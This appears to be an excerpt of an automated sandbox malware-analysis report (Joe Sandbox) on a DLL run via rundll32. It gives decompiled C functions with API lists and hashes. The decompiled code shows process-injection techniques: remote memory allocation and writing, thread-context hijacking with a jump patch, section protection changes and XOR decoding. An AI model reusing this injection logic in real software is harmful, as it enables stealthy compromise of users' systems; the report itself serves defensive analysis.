Part of subcall function 1000DD67: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B

GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 1000BE65

Strings

TEMP, xrefs: 1000BF06, 1000BF11, 1000BF22
SystemDrive, xrefs: 1000BF31, 1000BF3C, 1000BF51
%s\%s, xrefs: 1000BED7
TEMP, xrefs: 1000BED1
USERPROFILE, xrefs: 1000BEC2, 1000BEF0

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3040727122-2706916422
Opcode ID: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
Instruction ID: 223de3120ca2146f2b08ea88d8ddf8a015e776c32fe29826ff6494a04fce2d39
Opcode Fuzzy Hash: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
Instruction Fuzzy Hash: 49A18E35700616AFE714EF70DC89FEAB7E9FF08340F10016AF5099B656EB70AA458B91

Uniqueness

Uniqueness Score: -1.00%

Function 10001015 Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				void _v257;
				char _v258;
				char _v260;
				short _v772;
				intOrPtr _t21;
				WCHAR* _t28;
				long _t29;
				char _t32;
				char _t33;
				int _t44;
				void* _t48;
				void* _t58;
				int _t61;
				intOrPtr* _t63;

				_t48 = __ecx;
				if(_a8 != 1) {
					if(_a8 != 0) {
						L11:
						return 1;
					}
					_t21 =  *0x10020fa0; // 0x474f8a0
					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
					L3:
					return 0;
				}
				E100091D2();
				E100095AD();
				 *0x10020fa8 = _a4;
				 *0x10020fa4 = 1;
				E1001443B(_a4);
				 *_t63 = 0x14c; // executed
				_t28 = E100091B2(_t48); // executed
				_a8 = _t28;
				_t29 = GetFileAttributesW(_t28); // executed
				if(_t29 == 0xffffffff) {
					E10009E2E( &_a8);
					_t58 = 0x14;
					_t61 = 0;
					do {
						_t32 =  *0x1001d868; // 0x6665
						_v260 = _t32;
						_t33 =  *0x1001d86a; // 0x0
						_v258 = _t33;
						memset( &_v257, 0, 0xfd);
						memset( &_v772, 0, 0x200);
						_t63 = _t63 + 0x18;
						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
						_t58 = _t58 - 1;
					} while (_t58 != 0);
					 *0x10020fa0 = E10009559(0x144, 0x26e);
					_a8 =  *[fs:0x30];
					if(_a8[1] == 0) {
						L10:
						goto L11;
					}
					_t44 = 0;
					do {
						 *(_t44 + 0x1001f820) =  *(_t44 + 0x1001f820) ^ 0x00000009;
						_t44 = _t44 + 1;
					} while (_t44 < 0x80);
					do {
						 *(_t61 + 0x1001f050) =  *(_t61 + 0x1001f050) ^ 0x000000aa;
						_t61 = _t61 + 1;
					} while (_t61 < 0x80);
					goto L10;
				}
				E10009E2E( &_a8);
				goto L3;
			}

0x10001015
0x10001025
0x1000113d
0x10001132
0x00000000
0x10001132
0x1000113f
0x10001149
0x1000106f
0x00000000
0x1000106f
0x1000102b
0x10001030
0x10001039
0x1000103e
0x10001044
0x10001049
0x10001050
0x10001057
0x1000105a
0x10001066
0x10001079
0x10001081
0x10001082
0x10001084
0x10001084
0x1000108a
0x10001091
0x1000109b
0x100010a9
0x100010bb
0x100010c0
0x100010da
0x100010e0
0x100010e0
0x100010fa
0x10001105
0x1000110f
0x10001130
0x00000000
0x10001131
0x10001111
0x10001118
0x10001118
0x1000111f
0x10001120
0x10001124
0x10001124
0x1000112b
0x1000112c
0x00000000
0x10001124
0x10001069
0x00000000

APIs

Part of subcall function 100091D2: HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB

GetFileAttributesW.KERNELBASE(00000000), ref: 1000105A
memset.MSVCRT ref: 100010A9
memset.MSVCRT ref: 100010BB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 100010DA

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: memset$AttributesByteCharCreateFileHeapMultiWide
String ID:
API String ID: 371002992-0
Opcode ID: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
Instruction ID: 590752042698cd2f4cdee0f974b65d0578b31557d413badee9f24b4b120a3a80
Opcode Fuzzy Hash: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
Instruction Fuzzy Hash: D531E6756003656FE720DF68CC49BDA77E9EB093A0F10816AF558CB1C6D774D981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000A93E Relevance: 6.1, APIs: 4, Instructions: 92
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A93E(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v15;
				void _v16;
				long _v20;
				void* _v24;
				long _v28;
				void* _v32;
				struct _CONTEXT _v748;
				void* _t34;
				void _t43;
				void* _t61;
				long _t62;
				void* _t65;
				void** _t68;
				void* _t69;

				_t68 = __edx;
				_t61 = __ecx;
				_t34 = E1000A51F( *((intOrPtr*)(__edx)), _a4); // executed
				_t69 = _t34;
				if(_t69 == 0) {
					L8:
					return _t69;
				}
				E1000936A( &_v748, 0, 0x2cc);
				_v748.ContextFlags = 0x10002;
				if(GetThreadContext( *(__edx + 4),  &_v748) == 0) {
					goto L8;
				}
				_v20 = _v20 & 0x00000000;
				_t65 = _v748.Eax;
				_t43 = _t69 - _a4 + _t61;
				if(_a8 != 1) {
					if(_a8 != 2) {
						return 0;
					}
					_v16 = _t43;
					_t62 = 8;
					L6:
					_v32 = _t65;
					_v24 = _t65;
					_v8 = _t62;
					NtProtectVirtualMemory( *_t68,  &_v24,  &_v8, 4,  &_v20);
					if(NtWriteVirtualMemory( *_t68, _v748.Eax,  &_v16, _t62,  &_v8) >= 0) {
						_v28 = _v28 & 0x00000000;
						NtProtectVirtualMemory( *_t68,  &_v32,  &_v8, _v20,  &_v28);
					} else {
						_t69 = 0;
					}
					goto L8;
				}
				_v16 = 0xe9;
				_t62 = 5;
				_v15 = _t43 - _t65 - _t62;
				goto L6;
			}

0x1000a94a
0x1000a94c
0x1000a953
0x1000a958
0x1000a95c
0x1000aa0e
0x00000000
0x1000aa0e
0x1000a970
0x1000a978
0x1000a999
0x00000000
0x00000000
0x1000a99b
0x1000a9a4
0x1000a9aa
0x1000a9b0
0x1000a9c6
0x00000000
0x1000aa34
0x1000a9ca
0x1000a9cd
0x1000a9ce
0x1000a9d1
0x1000a9da
0x1000a9e1
0x1000a9ec
0x1000aa0a
0x1000aa15
0x1000aa2f
0x1000aa0c
0x1000aa0c
0x1000aa0c
0x00000000
0x1000aa0a
0x1000a9b6
0x1000a9ba
0x1000a9bd
0x00000000

APIs

Part of subcall function 1000A51F: NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000A991
NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 1000A9EC
NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001,?,00000000,00000000), ref: 1000AA05
NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000,?,00000000,00000000), ref: 1000AA2F

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$Protect$AllocateContextThreadWritememset
String ID:
API String ID: 4020149312-0
Opcode ID: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
Instruction ID: d2ed932ffaf4f6edbd0bce7d0d5901d33af284a1343d289a9543d0866ce73f30
Opcode Fuzzy Hash: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
Instruction Fuzzy Hash: 72313C76A0021AAFEB10CF94CD89EEEBBB9EB09354F104266E509E7154D7709B84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C800 Relevance: 6.1, APIs: 4, Instructions: 82
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000C800(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				char _v316;
				signed int _t20;
				signed int _t21;
				char _t27;
				intOrPtr _t37;
				void* _t40;
				void* _t51;
				void* _t55;
				void* _t57;

				_t40 = __edx;
				_v304 = __ecx;
				_t20 = CreateToolhelp32Snapshot(2, 0);
				_t57 = _t20;
				_t21 = _t20 | 0xffffffff;
				if(_t57 != _t21) {
					E1000936A( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t57,  &_v304) != 0) {
						_t27 = E100091E7(0x20);
						_v316 = _t27;
						_t51 = 0x1f;
						do {
							_t9 = _t51 + 0x63; // 0x82
							 *((char*)(_t51 + _t27)) = _t9;
							_t51 = _t51 - 1;
						} while (_t51 >= 0);
						E10009203( &_v316, 0);
						do {
							_t55 = _v312( &_v308, _t40);
						} while (_t55 != 0 && Process32Next(_t57,  &_v308) != 0);
						FindCloseChangeNotification(_t57);
						_t21 = 0 | _t55 == 0x00000000;
					} else {
						_t37 =  *0x10020fa0; // 0x474f8a0
						 *((intOrPtr*)(_t37 + 0x34))(_t57);
						_t21 = 0xfffffffe;
					}
				}
				return _t21;
			}

0x1000c818
0x1000c81a
0x1000c81e
0x1000c821
0x1000c823
0x1000c828
0x1000c83b
0x1000c843
0x1000c857
0x1000c869
0x1000c871
0x1000c875
0x1000c876
0x1000c876
0x1000c879
0x1000c87c
0x1000c87c
0x1000c888
0x1000c88f
0x1000c899
0x1000c89d
0x1000c8ba
0x1000c8c1
0x1000c859
0x1000c859
0x1000c85f
0x1000c864
0x1000c864
0x1000c857
0x1000c8ca

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000C81E

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

Process32First.KERNEL32(00000000,?), ref: 1000C852
Process32Next.KERNEL32(00000000,?), ref: 1000C8AD
FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000C8BA

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 2518216231-0
Opcode ID: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
Instruction ID: 36a9b33bf08feeffb89c0f046acd7b405da6ef9df32260d613b3c798c1d25f8e
Opcode Fuzzy Hash: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
Instruction Fuzzy Hash: 1421F8336043056FE310DF64DC45E9A7BD9EF893A0F24052AF554C75D6EA30D909C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 100144D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E100144D8(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				long _v44;
				void* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				char _v76;
				void* _t180;
				void* _t181;

				_v64 = _v64 & 0x00000000;
				if(_a12 == 0) {
					return __eax | 0xffffffff;
				}
				_v32 = _a12;
				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
				_v52 = _v40;
				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
				_v20 = _a12 + _t16;
				_v36 = _v36 & 0x00000000;
				do {
				} while (0 != 0);
				_v44 = 4;
				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
				_v48 = _a16;
				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
				if(_v28 >= 0) {
					_v12 = _v12 & 0x00000000;
					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
							E1000936A( &_v76, 0, 9);
							E100092CA( &_v76, _v12 * 0x28 + _v20, 8);
							_t181 = _t181 + 0x18;
							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
							_v8 = _v8 & 0x00000000;
							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
							_v16 = _v56;
							if(_v16 == 0x20000000) {
								_v8 = 0x10;
							} else {
								if(_v16 == 0x40000000) {
									_v8 = 2;
									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
										_v8 = 4;
									}
								} else {
									if(_v16 == 0x60000000) {
										_v8 = 0x20;
									} else {
										if(_v16 == 0x80000000) {
											_v8 = 4;
										} else {
											if(_v16 == 0xa0000000) {
												_v8 = 0x40;
											} else {
												if(_v16 == 0xc0000000) {
													_v8 = 4;
												} else {
													if(_v16 == 0xe0000000) {
														_v8 = 0x40;
													}
												}
											}
										}
									}
								}
							}
							while(0 != 0) {
							}
							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
							if(_v28 >= 0) {
								while(0 != 0) {
								}
								L43:
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							while(0 != 0) {
							}
							goto L43;
						}
						goto L10;
					}
					return 0;
				}
				L6:
				if(0 == 0) {
					return 0xffffffff;
				} else {
				}
				goto L6;
			}

0x100144de
0x100144e6
0x00000000
0x100144e8
0x100144f3
0x100144ff
0x10014505
0x10014511
0x10014518
0x1001451b
0x1001451f
0x1001451f
0x10014525
0x10014537
0x1001453d
0x10014558
0x1001455f
0x1001456f
0x1001457c
0x10014598
0x100145a4
0x100145ba
0x100145bf
0x100145d0
0x100145d3
0x100145e7
0x100145ed
0x100145f7
0x10014648
0x100145f9
0x10014600
0x10014654
0x10014669
0x100146aa
0x100146aa
0x10014602
0x10014609
0x100146b3
0x1001460f
0x10014616
0x100146bc
0x1001461c
0x10014623
0x100146c5
0x10014629
0x10014630
0x100146ce
0x10014636
0x1001463d
0x100146d7
0x100146d7
0x1001463d
0x10014630
0x10014623
0x10014616
0x10014609
0x10014600
0x100146de
0x100146e2
0x100146ef
0x1001470a
0x10014711
0x1001471b
0x1001471f
0x10014721
0x10014575
0x10014579
0x00000000
0x10014579
0x10014713
0x10014717
0x00000000
0x10014719
0x00000000
0x1001459a
0x00000000
0x10014726
0x10014561
0x10014563
0x00000000
0x00000000
0x10014565
0x00000000

APIs

NtProtectVirtualMemory.NTDLL(100043D8,?,?,00000004,00000000), ref: 10014555

Strings

@, xrefs: 100146D7

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @
API String ID: 2706961497-2766056989
Opcode ID: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
Instruction ID: 8c9ccfd38e53d97595bd4f830bc44a0b9f9517175c763c98dc2f2187c2248c51
Opcode Fuzzy Hash: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
Instruction Fuzzy Hash: 2A713A70D04209DFDB50CFA4C980BEEBBF4EB05359F228566E811EA2A1DB74DA91DF11

Uniqueness

Uniqueness Score: -1.00%

Function 1000CAF3 Relevance: 4.6, APIs: 3, Instructions: 63
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000CAF3(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
				void* _v8;
				long _v12;
				long _v16;
				long _t25;
				long _t37;
				void* _t41;
				void* _t42;

				_t37 = _a8;
				_t41 = __ecx;
				_a8 = _t37;
				_t42 = __edx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
				if(_t25 < 0) {
					L6:
					return 0;
				}
				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
					L4:
					if(_v8 != 0) {
						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
					}
					goto L6;
				}
				_a8 = _t37;
				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
					goto L4;
				}
				return _v8;
			}

0x1000cafa
0x1000cb0a
0x1000cb0c
0x1000cb15
0x1000cb17
0x1000cb1c
0x1000cb1f
0x1000cb22
0x1000cb26
0x1000cb71
0x00000000
0x1000cb71
0x1000cb39
0x1000cb5a
0x1000cb5e
0x1000cb6e
0x1000cb6e
0x00000000
0x1000cb5e
0x1000cb3e
0x1000cb53
0x00000000
0x00000000
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtectWrite
String ID:
API String ID: 2264391890-0
Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction ID: 892a4515f77ee017147e8a2b0b2c61a0bf4351e7243d22ba98e9bd68d4923f67
Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction Fuzzy Hash: CE11E976A0020DBFEB05CF95C845EDEBBBCEF48354F108166BA19D6140D730DB049BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA38 Relevance: 4.5, APIs: 3, Instructions: 45
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000AA38(void* __ecx, void* __eflags) {
				char _v44;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t17;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;

				_t9 =  *0x10020fd8; // 0x474fc50
				_t1 = _t9 + 0xac; // 0xd7ff51ae
				_t21 = __ecx;
				E1000C08F( &_v44,  *_t1 + 7, __eflags);
				_t32 = 0;
				_t12 =  *0x10020fa0; // 0x474f8a0
				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
				_t29 = _t13;
				if(_t29 != 0) {
					GetLastError();
					NtResumeThread( *(_t21 + 4), 0);
					_t17 =  *0x10020fa0; // 0x474f8a0
					_push(0x2710);
					_push(_t29);
					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
						_t32 = 1;
					}
					FindCloseChangeNotification(_t29);
					_t13 = _t32;
				}
				return _t13;
			}

0x1000aa3b
0x1000aa43
0x1000aa4b
0x1000aa54
0x1000aa5c
0x1000aa5f
0x1000aa67
0x1000aa6d
0x1000aa71
0x1000aa73
0x1000aa82
0x1000aa85
0x1000aa8a
0x1000aa8f
0x1000aa95
0x1000aa99
0x1000aa99
0x1000aaa1
0x1000aaa4
0x1000aaa4
0x1000aaaa

APIs

GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA73
NtResumeThread.NTDLL(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA82
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AAA1

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotificationResumeThread
String ID:
API String ID: 4135917582-0
Opcode ID: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
Instruction ID: ecd51d03452cafcdcdf148b0bc3d5607b702456ca6ceb967f89cd25d37e20497
Opcode Fuzzy Hash: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
Instruction Fuzzy Hash: 02012632301120AFD350CBA9CDC8DAB3BF9EF4E6A1B150024FA05D7616C730D802CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000A51F Relevance: 3.1, APIs: 2, Instructions: 107
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000A51F(void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				long _t37;
				void* _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				void* _t58;
				void* _t71;
				intOrPtr* _t73;

				_v8 = _v8 & 0x00000000;
				_t71 = __edx;
				_t58 = __ecx;
				_t3 = _t71 + 0x3c; // 0x100
				_t73 =  *_t3 + __edx;
				if( *_t73 != 0x4550) {
					L5:
					return 0;
				}
				_v16 =  *(_t73 + 0x50);
				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
				if(_t37 < 0) {
					goto L5;
				}
				_t38 = E10009252( *0x10020fd8, 0x1ac4);
				_v12 = _t38;
				if(_t38 == 0) {
					goto L5;
				}
				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
				_t39 = E1000CAF3( *0x100210b4, _t58, _t38, 0x1ac4, 4); // executed
				_v20 = _t39;
				_push(0x1ac4);
				_push( &_v12);
				if(_t39 != 0) {
					E10009203();
					_t42 =  *0x10020fa8; // 0x10000000
					_v24 = _t42;
					_t43 =  *0x10020fd8; // 0x474fc50
					_v28 = _t43;
					 *0x10020fa8 = _v8;
					 *0x10020fd8 = _v20;
					_t46 = E10009252(_t71,  *(_t73 + 0x50)); // executed
					_v12 = _t46;
					if(_t46 == 0) {
						goto L5;
					}
					E1000A49E(_t46, _v8, _t71);
					_v32 = _v32 & 0x00000000;
					 *0x10020fa8 = _v24;
					 *0x10020fd8 = _v28;
					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
						goto L5;
					}
					E100144D8(_t52,  *0x100210b4, _t58, _t71, _v8); // executed
					E10009203( &_v12, 0);
					return _v8;
				}
				E10009203();
				goto L5;
			}

0x1000a525
0x1000a52c
0x1000a52e
0x1000a530
0x1000a533
0x1000a53b
0x1000a5b1
0x00000000
0x1000a5b1
0x1000a542
0x1000a55a
0x1000a55e
0x00000000
0x00000000
0x1000a56b
0x1000a570
0x1000a577
0x00000000
0x00000000
0x1000a580
0x1000a592
0x1000a59a
0x1000a5a2
0x1000a5a7
0x1000a5a8
0x1000a5b8
0x1000a5bd
0x1000a5c2
0x1000a5c5
0x1000a5ca
0x1000a5d0
0x1000a5d8
0x1000a5e1
0x1000a5e9
0x1000a5ee
0x00000000
0x00000000
0x1000a5f6
0x1000a5fe
0x1000a602
0x1000a60b
0x1000a628
0x00000000
0x00000000
0x1000a635
0x1000a640
0x00000000
0x1000a648
0x1000a5aa
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A
NtWriteVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00000000), ref: 1000A623

Part of subcall function 1000CAF3: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
Part of subcall function 1000CAF3: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
Part of subcall function 1000CAF3: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E

Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
String ID:
API String ID: 4171237596-0
Opcode ID: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
